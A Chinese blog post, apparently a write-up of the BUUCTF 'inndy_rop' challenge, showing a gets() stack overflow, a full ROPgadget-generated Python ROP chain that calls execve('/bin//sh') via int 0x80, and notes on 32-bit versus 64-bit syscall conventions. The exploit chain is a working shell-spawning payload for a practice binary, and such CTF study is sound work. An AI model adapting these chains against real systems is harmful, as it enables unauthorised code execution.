BUUCTF - inndy_rop 杂谈、32位与64位系统调用、与思考

First Post:

Last Update:

         总之先从题目开始看吧,是一道非常简单但却让我长见识的题……

1
2
3
4
5
6
int overflow()
{
  char v1[12]; // [esp+Ch] [ebp-Ch] BYREF

  return gets(v1);
}

        明显的栈溢出,且程序基本没有特别的保护,正常构造rop链即可拿到shell

        主要是想拓展一下系统调用与一个简单的获取ROP方法

1
ROPgadget --binary rop --ropchain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
ROP chain generation
===========================================================

- Step 1 -- Write-what-where gadgets

[+] Gadget found: 0x8050cc5 mov dword ptr [esi], edi ; pop ebx ; pop esi ; pop edi ; ret
[+] Gadget found: 0x8048433 pop esi ; ret
[+] Gadget found: 0x8048480 pop edi ; ret
[-] Can't find the 'xor edi, edi' gadget. Try with another 'mov [r], r'

[+] Gadget found: 0x805466b mov dword ptr [edx], eax ; ret
[+] Gadget found: 0x806ecda pop edx ; ret
[+] Gadget found: 0x80b8016 pop eax ; ret
[+] Gadget found: 0x80492d3 xor eax, eax ; ret

- Step 2 -- Init syscall number gadgets

[+] Gadget found: 0x80492d3 xor eax, eax ; ret
[+] Gadget found: 0x807a66f inc eax ; ret

- Step 3 -- Init syscall arguments gadgets

[+] Gadget found: 0x80481c9 pop ebx ; ret
[+] Gadget found: 0x80de769 pop ecx ; ret
[+] Gadget found: 0x806ecda pop edx ; ret

- Step 4 -- Syscall gadget

[+] Gadget found: 0x806c943 int 0x80

- Step 5 -- Build the ROP chain

#!/usr/bin/env python2
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = ''

p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80

         ‘–ropchain’参数能够直接生成一条rop链来get shell

        其具体的构造方式不必细究,实际上笔者在写rop的时候也肯定不会这样写,不过结论来说,只需要加上合适的偏移就能在本题中直接拿到shell,倒是非常方便

      后日谈:这种生成方式相当机械,部分gadget稍有缺失就会导致生成失败,因此实际环境中可能并不好用,况且PIE开启时,就可能完全派不上用场了

然后是本篇的正文:

        在阅读了其生成的ROP链之后,笔者好奇地搜了一下是否有“syscall”指令,因为上述是通过“int 0x80”来陷入内核的,那为什么不用syscall呢?

        参考本贴:https://www.cnblogs.com/Max-hhg/articles/14266574.html

        两者的差异只有传参规则、指令与调用号不同而已

        32位:EBX、ECX、EDX、ESI、EDI、EBP

        64位:RDI、RSI、RDX、R10、R8、R9

        而在32位系统中使用 “int 0x80”,而64位系统中使用“syscall”,仅此而已的差别

后话:

        本来有点好奇,“为什么32位程序里会出现syscall指令”,后来对着IDA找汇编指令才发现,ROPgadget识别到的syscall在IDA里连对应的地址都找不到。

        实际上就是把原本的指令字节分割一下,然后单独取出能被当作syscall的字节

        嘛……这么来看还怪没有意义的…… ​

插画IDA:92121278